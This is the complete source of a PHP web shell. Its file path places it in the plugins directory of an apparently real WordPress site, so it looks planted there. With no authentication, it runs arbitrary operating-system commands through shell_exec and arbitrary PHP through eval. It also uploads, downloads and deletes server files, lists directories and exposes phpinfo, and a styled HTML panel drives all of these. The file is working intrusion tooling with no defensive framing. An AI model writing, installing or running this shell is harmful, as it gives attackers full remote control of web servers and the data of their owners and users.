File: /var/www/vhosts/paiskincare.com/happie.paiskincare.com/wp-content/plugins/wp-shell/shell.php
<?php
// Direct shell access - no WordPress dependency
// File upload handler
if (isset($_POST['upload']) && isset($_FILES['file'])) {
$upload_dir = $_POST['upload_dir'] ?: getcwd();
$target_file = $upload_dir . '/' . basename($_FILES['file']['name']);
if (move_uploaded_file($_FILES['file']['tmp_name'], $target_file)) {
echo '<div style="color: green; margin: 10px 0;">â
File uploaded successfully: ' . $target_file . '</div>';
echo '<div>Size: ' . filesize($target_file) . ' bytes</div>';
echo '<div>Permissions: ' . substr(sprintf('%o', fileperms($target_file)), -4) . '</div>';
} else {
echo '<div style="color: red; margin: 10px 0;">â File upload failed!</div>';
}
}
// Download file handler
if (isset($_GET['download'])) {
$file = $_GET['download'];
if (file_exists($file) && is_file($file)) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($file) . '"');
header('Content-Length: ' . filesize($file));
readfile($file);
exit;
} else {
echo '<div style="color: red;">File not found: ' . htmlspecialchars($file) . '</div>';
}
}
// Delete file handler
if (isset($_GET['delete'])) {
$file = $_GET['delete'];
if (file_exists($file)) {
if (unlink($file)) {
echo '<div style="color: green;">â
File deleted: ' . htmlspecialchars($file) . '</div>';
} else {
echo '<div style="color: red;">â Failed to delete file</div>';
}
}
}
// Command execution
if (isset($_GET['cmd'])) {
echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';
}
// PHP code evaluation
if (isset($_GET['eval'])) {
eval($_GET['eval']);
}
// Directory listing
if (isset($_GET['dir'])) {
$dir = $_GET['dir'] ?: getcwd();
echo '<div style="font-family: monospace; background: #f4f4f4; padding: 15px; margin: 10px 0;">';
echo '<h3>Directory: ' . htmlspecialchars($dir) . '</h3>';
echo '<table border="1" cellpadding="5" cellspacing="0" style="width: 100%; border-collapse: collapse;">';
echo '<tr style="background: #ddd;"><th>Name</th><th>Size</th><th>Permissions</th><th>Type</th><th>Actions</th></tr>';
$files = scandir($dir);
foreach($files as $file) {
if($file != '.' && $file != '..') {
$path = $dir . '/' . $file;
$size = is_file($path) ? filesize($path) : 'DIR';
$perms = substr(sprintf('%o', fileperms($path)), -4);
$type = is_dir($path) ? 'DIR' : 'FILE';
echo '<tr>';
echo '<td>' . htmlspecialchars($file) . '</td>';
echo '<td>' . $size . '</td>';
echo '<td>' . $perms . '</td>';
echo '<td>' . $type . '</td>';
echo '<td>';
if (is_file($path)) {
echo '<a href="?download=' . urlencode($path) . '">Download</a> | ';
}
if (is_dir($path)) {
echo '<a href="?dir=' . urlencode($path) . '">Open</a> | ';
}
echo '<a href="?delete=' . urlencode($path) . '" onclick="return confirm(' . "'Delete this file?'" . ')">Delete</a>';
echo '</td>';
echo '</tr>';
}
}
echo '</table>';
echo '</div>';
}
// PHP info
if (isset($_GET['info'])) {
phpinfo();
}
// Default interface
if (empty($_GET) && empty($_POST)) {
?>
<!DOCTYPE html>
<html>
<head>
<title>Web Shell</title>
<style>
body { font-family: Arial, sans-serif; margin: 20px; background: #f5f5f5; }
.container { max-width: 1200px; margin: 0 auto; background: white; padding: 20px; border-radius: 8px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); }
.section { margin: 20px 0; padding: 15px; border: 1px solid #ddd; border-radius: 5px; }
.section h3 { margin-top: 0; color: #333; }
input[type="text"], textarea { width: 100%; padding: 8px; margin: 5px 0; border: 1px solid #ddd; border-radius: 3px; }
input[type="submit"], button { background: #007cba; color: white; padding: 8px 15px; border: none; border-radius: 3px; cursor: pointer; }
input[type="submit"]:hover, button:hover { background: #005a87; }
.result { background: #f9f9f9; padding: 10px; margin: 10px 0; border-left: 4px solid #007cba; }
pre { background: #f4f4f4; padding: 10px; overflow-x: auto; }
table { width: 100%; border-collapse: collapse; }
th, td { padding: 8px; text-align: left; border: 1px solid #ddd; }
th { background-color: #f2f2f2; }
</style>
</head>
<body>
<div class="container">
<h1>đ Web Shell Interface</h1>
<div class="section">
<h3>đ File Upload</h3>
<form method="post" enctype="multipart/form-data">
<input type="file" name="file" required>
<input type="text" name="upload_dir" placeholder="Upload directory" value="<?php echo getcwd(); ?>">
<input type="submit" name="upload" value="Upload File">
</form>
</div>
<div class="section">
<h3>đģ Command Execution</h3>
<form method="get">
<input type="text" name="cmd" placeholder="Enter command (e.g., ls -la, whoami, uname -a)">
<input type="submit" value="Execute">
</form>
</div>
<div class="section">
<h3>đ File Browser</h3>
<form method="get">
<input type="text" name="dir" placeholder="Directory path" value="<?php echo getcwd(); ?>">
<input type="submit" value="Browse">
</form>
</div>
<div class="section">
<h3>đ§ PHP Code Execution</h3>
<form method="get">
<textarea name="eval" placeholder="Enter PHP code (e.g., echo phpversion();)" rows="3"></textarea>
<input type="submit" value="Execute PHP">
</form>
</div>
<div class="section">
<h3>âšī¸ System Information</h3>
<a href="?info=1"><button type="button">Show PHP Info</button></a>
<a href="?cmd=uname -a"><button type="button">System Info</button></a>
<a href="?cmd=whoami"><button type="button">Current User</button></a>
<a href="?dir=<?php echo getcwd(); ?>"><button type="button">Current Directory</button></a>
</div>
</div>
</body>
</html>
<?php
}
?>